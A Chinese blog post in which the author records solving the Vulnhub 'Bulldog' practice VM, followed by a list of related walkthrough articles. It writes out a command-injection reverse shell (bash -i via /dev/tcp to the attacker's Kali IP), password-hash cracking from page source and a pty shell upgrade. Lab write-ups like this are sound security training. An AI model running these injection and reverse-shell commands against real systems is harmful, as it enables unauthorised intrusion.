Bulldog靶机 学习总结 网络安全

最新推荐文章于 2024-06-03 20:06:58 发布
最新推荐文章于 2024-06-03 20:06:58 发布
阅读量952 收藏 11
点赞数 25
分类专栏: 网络安全 靶机 自学 文章标签: 网络安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Shelby12345/article/details/135963785
版权
网络安全 同时被 3 个专栏收录
2 篇文章 1 订阅
订阅专栏
靶机
2 篇文章 0 订阅
订阅专栏
自学
2 篇文章 0 订阅
订阅专栏

安装完bulldog靶机

不知道是我vm的问题还是我哪里配置不行,最近这两个靶场的ip一开始都搜不到,和jis-ctf上一篇一样,需要把网卡改成ens33.

按照惯例,nmap扫一下局域网,扫出来是192.168.144.137

再扫一下端口,发现23,80,8080端口都开启,那就访问一下http网页。

写了一堆废话

老三样,再扫一下目录 dirb

发现

DIRECTORY: http://192.168.144.137/admin/  

DIRECTORY: http://192.168.144.137/dev/  

直接访问http://192.168.144.137/admin/    发现需要登陆,F12看一下很干净,没藏东西。

输入了一些参数抓了一下包,试图用sqlmap强行爆破一下,没有发现注入点。

访问一下http://192.168.144.137/dev/  试试看,里面有很多信息

记录了很多联系人账号

点击web-shell显示需要权限,可以联想到需要在前面admin页面登录之后才可以访问。

所以回到dev界面找找蛛丝马迹。

F12看一下有没有藏东西,仔细一看还真有,虽然正常网页并不会傻傻的把password放再html里,但是emmm。

一个一个试试看,发现ddf45997a7e18a25ad5f5cf222da64814dd060d5解码出来是bulldog

d8b8dd5e7f000b8dea26ef8428caf38c04466b3e解码出来是bulldoglover。

回到登录界面试试,nick可以用bulldog登录,sarah可以用bulldoglover登录(权限似乎都是一样的)

回到/dev/shell页面,发现了一个建议shell界面

试试ifconfig


&组合一下发现可以并发

这个时候就想到了反弹shell,再kali监听1234号端口

简单的&组合直接跑会500报错echo&bash -i >& /dev/tcp/192.168.144.129/1234 0>&1

找了一下资料,换成这样echo "bash -i >& /dev/tcp/192.168.144.129/1234 0>&1" | bash就ok拉

进去了就看看系统有什么用户,cat etc/passwd看一下

发现了自己django,然后注意到有个id是bulldogadmin的很可疑,再系统中查找一下bulldogadmin所属的文件find / -user bulldogadmin 2>/dev/null(2>/dev/null: 将标准错误输出重定向到 /dev/null)这个和通道有关,下次学到了再记笔记。

发现有两个隐藏文件(其实其他的我也打开来看了一下,没啥有用的)

less .hiddenadmindirectory/note,发现里面写了点东西,但是没锤子用

less .hiddenadmindirectory/customPermissionApp发现一堆乱码,用strings打开一下

这个时候还是有点懵逼,把里面的东西全部丢给chatgpt,让他帮审计一下,发现SUPERultH
imatePASHSWORDyouHCANTget有点像密码.

试试进入root模式,su一下发现没用terminal

第一次遇到这种情况,查了资料发现需要先调用本地shell
python -c 'import pty;pty.spawn("/bin/bash")'

输入SUPERultimatePASSWORDyouCANTget,密码错误,又去找了找前辈的答案,发现H都是多余的,SUPERultimatePASSWORDyouCANTget

回到最初的menu,ls发现有个txt文件,vi一下,

结束,感谢@Komorebi的帖子的指导

Bon橙
关注
专栏目录
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[网络安全自学篇] 八十七.恶意代码检测技术详解及总结
热门推荐
杨秀璋的专栏
07-16 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了威胁情报分析,通过Python抓取FreeBuf网站“APT”主题的相关文章。这篇文章将详细总结恶意代码检测技术,包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。基础性文章,希望对您有所帮助~
【vulnhub】---bulldog靶机
qq_43168364的博客
08-21 378
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:bolldog靶机(192.168.1.105) 攻击机:kali Linux(192.168.1.104) 二、信息收集 主机发现 或者用netdiscover也可以。命令:netdiscover -i eth0 -r 192.168.1.0/24 端口扫描,首先用masscan看看它开启了哪些端口,他的速度过快时貌似发现不了某些端口,可以多扫描几次。 使用nmap进行版本探测
[渗透测试靶机10] vulnhub靶场 BULLDOG_ 1
weixin_47112073的博客
11-13 388
这个靶机难度较为简单,可以简单练手
靶机渗透【bulldog
学信安技术 卫国家之门
11-04 4651
一. bulldog靶机安装 1. 下载bulldog 靶场地址:Bulldog - VulnHub (可自行下载) 百度网盘:bulldog 提取码:qrnf 2. 将下载好的靶机存放在想存放的地方,建议放在其他虚拟机相同的目录下 3. 打开VMware,左上角文件 - - 打开 - - 找到存放bulldog的位置 4. 开启bulldog(开启后无需进行其他操作) 二. bulldog靶机渗透 设备信息: kali(NAT)IP:192.168.110.140 bulldog(NAT)IP:
vuInhub靶场实战系列--bulldog-1
weixin_45221204的博客
06-03 1415
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍bulldog-1靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)MD5在线解码、netcat、反弹shell、linux内核提权等内容。😃使用nmap进行主机发现和端口扫描使用dirbsearch进行目录扫描MD5解密netcat监听反弹shell。
kali渗透综合靶机(二)--bulldog靶机
W小哥
03-07 1039
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 二、bulldog靶机搭建 靶机: 将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑 设置网络模式,网卡选择仅主机模式 kali攻击机: 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox...
【vulnhub】--- bulldog2靶机
qq_43168364的博客
08-21 454
目录 一、实验环境 靶机bulldog2靶机(192.168.1.102、192.168.1.105) 攻击机:kali Linux(192.168.1.104) 二、靶机设置 我们首先进行登录 我们发现登录进去之后靶机是没有IP地址的,我们看看它的网卡配置文件。 这里网卡设置的是dhcp,我们可以通过dhclient命令来获取IP。建议设置为桥接。 现在两个网卡就都有IP地址了。接下来就可以进行渗透了。 三、信息收集 首先用nmap进行主机发现,命令:nmap -sn 192.168.1.
Vulnhub-Bulldog1 靶机渗透
Majula
02-01 599
WalkthroughDownloadDescriptionPen TestingScanningExploitationPrivilege EscalationSolution ISolution IIReview Download BULLDOG: 1 - VlunHub VM 镜像文件。 这里 VM 我导入配置失败,分配不了 IP,建议用 VirtualBox,因为靶机默认模式是桥接,攻击机也要设为桥接模式。 我是 VM 运行 Kali,VirtualBox 运行靶机,如果你是这种情况,为了更加直观,
【VulnHub靶机渗透】一:BullDog2
野原新之助
03-20 1167
在网上大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试,熟悉了整体步骤,希望之后的靶机能越来越多的自己独立完成(大佬NB!),现将详细过程做如下整理。 简介 ...
靶机实战(bulldog)
weixin_45605313的博客
05-28 415
bulldog实验环境实验过程信息收集1.主机发现2.端口扫描3.目录扫描4.web站指纹5.漏洞发现漏洞利用提权总结 实验环境 靶机bulldog 测试机:win10 ,kali 实验过程 信息收集 1.主机发现 靶机ip:192.168.238.146 2.端口扫描 先用masscan进行快速全面的扫描 nmap扫描得到端口服务信息 3.目录扫描 访问80,web服务进行目录扫描 4.web站指纹 以python环境搭建web 5.漏洞发现 1.尝试ssh弱口令:利用msf,hydra等
靶机实战-bulldog1
滕财然的博客
01-19 1047
bulldog1-靶机实战靶机实战:bulldog11、主机发现2、扫描端口3、web渗透(80端口)4、提权 靶机实战:bulldog1 先要知道对方的IP是否存活,也就是主机发现 1、主机发现 netdiscover -i etho -r IP/网段 属于主动 -i 指定网卡 -r 指定网段 找到目标靶机IP:192.168.232.134 也可以用nmap -sn 扫,看自己心情。...
Bulldog靶机-walkthrough
ins1ght的博客
09-05 1483
Bulldog靶机,一个CTF类型的靶机
Bulldog靶场记录
weixin_46411728的博客
09-18 909
bulldog靶场
靶机测试-bulldog
ximo的博客
02-27 518
测试步骤信息收集主机发现端口及其服务扫描目录扫描测试对应端口服务测试后台目录寻找漏洞:反弹shell因为知道网站的编程语言是python,所以可以通过python进行反弹shell:提权 信息收集 主机发现 kali IP地址查询,确认靶机存在网段 使用nmap进行主机发现: namp -sP 192.168.31.0/24 端口及其服务扫描 nmap -sV -O 192.168.31.181 发现开放了23,80,8080端口及其服务 访问其80及8080端口(因为此端口开放了http服
渗透靶机BULLDOG
qq_43235703的博客
02-02 1190
靶机渗透之BULLDOG 渗透环境: 攻击机:kali(10.0.10.198) 靶机:vmbox(10.0.10.208) 连接模式:全部为桥接 探嗅目标 安装好我们的靶机之后开机,然后你的ip地址就出现在靶机界面上面,也省了我们用kali来扫 但是多少这达不到我们模拟实战的过程,真正的渗透谁会把地址摆着给你啊对不对,所以还是要动手用netdiscover来扫一波,直接扫出来然后上nmap扫端...
bulldog2--靶机渗透
weixin_44769042的博客
10-30 563
靶机记录--7 目录 分配ip 主机发现 端口扫描 服务版本,操作系统扫描 开始渗透 水平越权 垂直越权 反弹shell 尝试提权 得到flag 总结 分配ip 这个靶机的IP要重新分发(dhclient) 主机发现 端口扫描 这里扫到两个ip,但是mac地址相同,扫一个就行 服务版本,操作系统扫描 开始渗透 1> 来到主页,有登陆点,注册点 2> 来到登陆点,万能密码,弱口令,暴力破解走一波 3...
Vulnhub-Bulldog靶机实战
御七彩虹猫
03-24 1465
Vulnhub-Bulldog靶机实战
我是说写成utils/resnet18_clsidx_to_labels.names的形式
最新发布
09-26
举个例子,如果你有一个ResNet18模型,在训练过程中它学习了1000个不同的类别,每个类别的数字作为索引(从0到999)。这个文件就会包含一行行的内容,每行对应一个索引和相应的英文标签,比如: ``` 0 n02105056 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值